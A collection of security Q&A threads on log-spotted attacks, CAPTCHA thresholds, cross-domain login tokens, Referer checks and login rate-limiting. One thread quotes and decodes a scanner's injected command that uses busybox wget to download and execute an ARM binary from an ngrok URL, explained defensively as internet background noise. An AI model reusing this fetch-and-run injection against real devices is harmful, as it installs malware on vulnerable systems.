I saw requests to "/?1=" in my server logs. What is this? Some sort of attack attempt?

I saw this "/?1=" in two different apps I have. I have seen some weird stuff before and found that those are attacks targeted at wordpress which I never use. So, I wonder if this request is another weakness something else has.

Related

Can you confirm that this strange POST request is a kind of cyber attack?

I run a website whose only purpose is sharing textual information. There is no database plugged into the backend and no authentication of any kind. However, when I looked at the log I noticed this request:
POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
It has occurred twice, and my server responded with a 404 both times. Still, I'm a little concerned. My website runs on a Raspberry Pi plugged into my ISP's router. Even though the server process doesn't have any sudo rights, I'm wondering whether there is any risk.
Also, can someone explain what these suspicious entries mean? What could the risk be? And finally, can you share some tips / good practices for putting a device like a Raspberry Pi on the internet?
No need to be concerned. It is an attack, but it is not directed at your specific site; it is part of a scan of a large portion of the internet for a specific vulnerability.
The fact that your server responded with a 404 means it did not contain the vulnerable page.
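For reference, URL-decoding the keyPath parameter (%27 is a single quote, %0A a newline, and ${IFS} substitutes for whitespace to evade naive filters) shows the shell command the scanner was trying to inject. On a vulnerable device it would download an ARM binary from a throwaway ngrok URL and execute it:

    /bin/sh -c 'cd /tmp; rm -rf arm7; busybox wget http://19ce033f.ngrok.io/arm7; chmod 777 arm7; ./arm7'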
This will happen on any site exposed to the public internet and is considered a part of the background noise.
I also noticed the same request on my web servers.
Here is more info about the attack:
https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-draytek-products-could-allow-for-arbitrary-code-execution_2020-043/

When to Ask for a CAPTCHA: What Rules?

While there is a lot of discussion about CAPTCHA implementation, I couldn't find any details on the circumstances under which one should ask for a CAPTCHA, especially for a financial app serving consumers.
Some of the rules I can think of:
Require a CAPTCHA after 3 failed login/registration attempts.
Require a CAPTCHA after 3 duplicate calls while the user is already logged in.
I believe these rules are driven by security risk. Is there a better way to manage this? Is there any library that helps solve this problem?
Unfortunately, in situations like this, you'll always have to make a compromise somewhere between security and convenience. I think the specific numbers you chose are fine; a human probably won't do those things, and if something does, it's probably not a legitimate user. I would suggest that after you start to require CAPTCHAs to continue, you also keep counting those cases, log an alert at some point, and eventually ban the IP address if its actions get out of hand.
One place you'll have to compromise is on how you track users. If you do it by cookies, it will be more accurate, but a bot can simply not send cookies in most cases, eluding your tracking. The only real solution, then, is to track by IP address. The problem with this is that all users behind a shared IP address look the same, so three users each failing a single login looks (mostly) the same as one user failing three times. Also, if someone behind a shared IP address gets legitimately banned for abusing your site, other legitimate customers could be affected.
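As a rough illustration of that per-IP tracking and escalation, here is a minimal Node.js sketch; the thresholds (3 failures for a CAPTCHA, 10 for a ban) and the 15-minute window are illustrative assumptions, not recommendations:

    // Hypothetical escalation tracker: CAPTCHA after a few failures, ban later.
    const failures = new Map(); // ip -> { count, firstAt }
    const WINDOW_MS = 15 * 60 * 1000; // illustrative 15-minute window
    const CAPTCHA_AT = 3;
    const BAN_AT = 10;

    function recordFailure(ip) {
      const now = Date.now();
      const entry = failures.get(ip);
      if (!entry || now - entry.firstAt > WINDOW_MS) {
        failures.set(ip, { count: 1, firstAt: now });
        return 'ok';
      }
      entry.count += 1;
      if (entry.count >= BAN_AT) return 'ban';         // log an alert and block the IP
      if (entry.count >= CAPTCHA_AT) return 'captcha'; // require a CAPTCHA to continue
      return 'ok';
    }

    console.log(recordFailure('203.0.113.7')); // 'ok'; returns 'captcha' from the 3rd call on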
To sum it up, you'll need to find the balance you need between security and convenience.

Multi-Domain Login

I'm working on a little Node.js project, and after googling a lot I've become a bit confused; maybe some of you can point me back onto the road.
Several websites are generated by DocPad (excellent piece of software), and hosted on different domains.
All these websites shall now get a "login module" (which is also written in Node.js, using Passport). Visually, it will look similar to the excellent login slider from Web-Kreation (a demo is available here). My plan was to use nginx to route all /login requests to the login app, which is working fine.
The problem is rather the multiple domains and the client-side implementation of it all. All logins use the same database.
Can I somehow use both together and create the session cookies from the login module (which could use the same domain all the time)?
I'm answering my own question for reference, in case someone else comes across the same problem.
In the end, I solved my problem with a somewhat different setup. Instead of a module running under each site's own DNS, I use a central login application for all sites. The sites themselves do not need access to any personal information, so that's not a problem.
DocPad is still being used to generate the different websites statically (it works excellently - I know I say this very often, but if there's a brilliant piece of software out there, there's no reason not to mention it once in a while), and all static content is delivered to the user via a CDN.
The login system is a Node.js application using Redis as its only database. It runs on login.example.com and is integrated via a simple iframe on all pages rendered by DocPad.
After a successful login in the 'login-app', you can create an encrypted string with information about the current user. You can pass this string back in a GET/POST parameter while redirecting to the target domain. The encryption key is known only to the 'login-app' and your websites, so you can trust this encrypted data. It is necessary to make sure the encrypted string is different every time for the same user; for example, you can include the time of login or a random value. After decrypting the data, the target site can set an authorization cookie for its particular domain.
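Here is a minimal Node.js sketch of that hand-off, assuming a 256-bit key shared out of band between the login app and the sites; the payload fields and the one-minute freshness window are illustrative:

    // Hypothetical encrypted hand-off token using Node's built-in crypto module.
    const crypto = require('crypto');

    const SHARED_KEY = crypto.randomBytes(32); // in practice, distributed out of band

    // Login-app side: a random IV plus a timestamp make every token unique,
    // even for the same user, as the answer above requires.
    function createToken(user) {
      const iv = crypto.randomBytes(12);
      const cipher = crypto.createCipheriv('aes-256-gcm', SHARED_KEY, iv);
      const payload = JSON.stringify({ user, issuedAt: Date.now() });
      const encrypted = Buffer.concat([cipher.update(payload, 'utf8'), cipher.final()]);
      return Buffer.concat([iv, cipher.getAuthTag(), encrypted]).toString('base64url');
    }

    // Target-domain side: decrypt, verify freshness, then set its own session cookie.
    function readToken(token, maxAgeMs = 60 * 1000) {
      const raw = Buffer.from(token, 'base64url');
      const decipher = crypto.createDecipheriv('aes-256-gcm', SHARED_KEY, raw.subarray(0, 12));
      decipher.setAuthTag(raw.subarray(12, 28)); // 16-byte GCM tag authenticates the data
      const payload = JSON.parse(
        Buffer.concat([decipher.update(raw.subarray(28)), decipher.final()]).toString('utf8')
      );
      if (Date.now() - payload.issuedAt > maxAgeMs) throw new Error('token expired');
      return payload.user;
    }

    console.log(readToken(createToken({ id: 42, name: 'alice' }))); // { id: 42, name: 'alice' }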

"Referral Denied" Implementation

I was looking for a way to protect a web service from "synthetic queries". See this Security Stack Exchange question for more details.
It seemed that I had little alternative, until I came across NSE India's website, which implements a certain kind of measure against such synthetic queries.
I would like to know how they could have implemented a protection that works somewhat like this: you go to their website and search for a quote, let's say RELIANCE, and you get a page displaying the latest quote.
On analysis we find that the query being sent across is something like:
http://www.nseindia.com/marketinfo/equities/ajaxGetQuote.jsp?symbol=RELIANCE&series=EQ
But when we copy-paste the query directly into the browser, it returns "referral denied".
I guess such a procedure may also help me. Any ideas on how I might implement something similar?
It won't help you. Faking a referrer is trivial. The only protection against queries the attacker constructs themselves is server-side validation.
Referrer checks can sometimes be used to prevent hotlinking from other websites, but even that is rather hard to do, since certain programs send fake referrers and you don't want to block those users.
Referrer validation could help against other websites trying to manipulate a user's browser into accessing your site, such as some kinds of cross-site request forgery. But it never protects against malicious users. Against those, the only thing that helps is server-side validation. You can never trust the client if you don't trust the user of that client.
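For completeness, here is roughly what such a check could look like, as a hypothetical Express handler in Node.js (the path mirrors the URL in the question; the allowed origin and response fields are assumptions). Since any HTTP client can set the Referer header to whatever it likes, this only stops naive copy-pasting:

    // Hypothetical sketch of a Referer check like the one the question describes.
    const express = require('express');
    const app = express();

    app.get('/marketinfo/equities/ajaxGetQuote.jsp', (req, res) => {
      const referer = req.get('referer') || '';
      if (!referer.startsWith('http://www.nseindia.com/')) {
        return res.status(403).send('referral denied'); // trivially bypassed by forging the header
      }
      res.json({ symbol: req.query.symbol, series: req.query.series }); // placeholder response
    });

    app.listen(3000);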

How to defend against excessive login requests?

Our team has built a web application using Ruby on Rails. It currently doesn't restrict users from making excessive login requests. We want to ignore a user's login requests for a while after she has made several failed attempts, mainly to defend against automated robots.
Here are my questions:
How do I write a program or script that makes excessive requests to our website? I need it to help me test our web application.
How do I restrict a user who has made several unsuccessful login attempts within a period? Does Ruby on Rails have built-in solutions for identifying a requester and tracking whether she has made any recent requests? If not, is there a general way (not specific to Ruby on Rails) to identify a requester and keep track of her activities? Can I identify a user by IP address, cookies, or some other information I can gather from her machine? We also hope to distinguish normal users (who make infrequent requests) from automated robots (who make requests frequently).
Thanks!
One trick I've seen is to include form fields on the login form that are made invisible to the user through CSS.
Automated systems/bots will still see these fields and may attempt to fill them with data. If you see any data in such a field, you immediately know it's not a legitimate user and can ignore the request.
This is not a complete security solution, but it is one trick you can add to the arsenal.
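A minimal sketch of that honeypot trick as a hypothetical Express handler in Node.js; the field name "website" and the form markup in the comment are illustrative choices:

    // Hypothetical honeypot check. The login form would include an extra field,
    // e.g. <input name="website" style="display:none">, that humans never see.
    const express = require('express');
    const app = express();
    app.use(express.urlencoded({ extended: false }));

    app.post('/login', (req, res) => {
      if (req.body.website) {
        // A bot filled the invisible field; reject without revealing why.
        return res.status(400).send('Invalid request');
      }
      // ...continue with the normal credential check...
      res.send('credentials checked');
    });

    app.listen(3000);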
In regards to #1, there are many automation tools out there that can simulate high-volume posting to a given URL. Depending on your platform, something as simple as wget might suffice, or something as complex (relatively speaking) as a script that asks a user agent to post a given request multiple times in succession (again, depending on the platform, this can be simple; it also depends on your language of choice for task #1). A sketch of the latter follows below.
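For instance, here is a minimal Node.js script that fires a burst of login attempts at a test endpoint; the URL and credentials are placeholders for whatever your app exposes (it assumes Node 18+ for the global fetch):

    // Hypothetical load sketch: send 10 failed logins in succession to
    // exercise the lockout logic you are about to build.
    async function hammerLogin() {
      for (let i = 0; i < 10; i++) {
        const res = await fetch('http://localhost:3000/login', {
          method: 'POST',
          headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
          body: 'username=test&password=wrong',
        });
        console.log(`attempt ${i + 1}: HTTP ${res.status}`);
      }
    }

    hammerLogin();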
In regards to #2, consider first the lesser issue of someone just firing multiple attempts manually. Such instances usually share a session (that being the actual web server session); you should be able to track failed logins based on these session IDs and force an early failure if the volume of failed attempts breaks some threshold. I don't know of any plugins or gems that do this specifically, but even if there is none, it should be simple enough to create a solution.
If the session ID does not work, then a combination of IP address and User-Agent is also a pretty safe means, although individuals who use a proxy may find themselves blocked unfairly by such a practice (whether that is an issue depends largely on your business needs).
If the attacker is malicious, you may need to look at using firewall rules to block their access, as they are likely going to: a) use a proxy (so IP rotation occurs), b) not use cookies during probing, and c) not play nice with User-Agent strings.
Ruby on Rails provides means for testing your applications, as described in A Guide to Testing Rails Applications. A simple solution is to write a test containing a loop that sends 10 (or whatever value you define as excessive) login requests. The framework provides means for sending HTTP requests or faking them.
Not many people will abuse your login system, so just remembering the IP addresses of failed logins (for an hour, or whatever period you think is sufficient) should be enough, and it is not too much data to store. Unless some hacker has access to a great many IP addresses... but in such situations you'd need more serious security measures, I guess.
